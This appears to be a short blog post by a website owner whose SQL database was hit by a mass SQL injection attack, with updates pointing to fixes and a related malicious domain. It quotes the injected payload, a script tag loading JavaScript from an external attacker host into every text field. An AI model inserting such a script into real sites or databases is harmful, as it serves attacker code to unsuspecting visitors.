original post: a plea for help
I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.
As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.
For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.
update on uc8010(dot)com
The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.
Also watch out for ucmal.com (188.8.131.52) which appears to be up to similiar tricks.
microsoft issue advice on sql injection attacks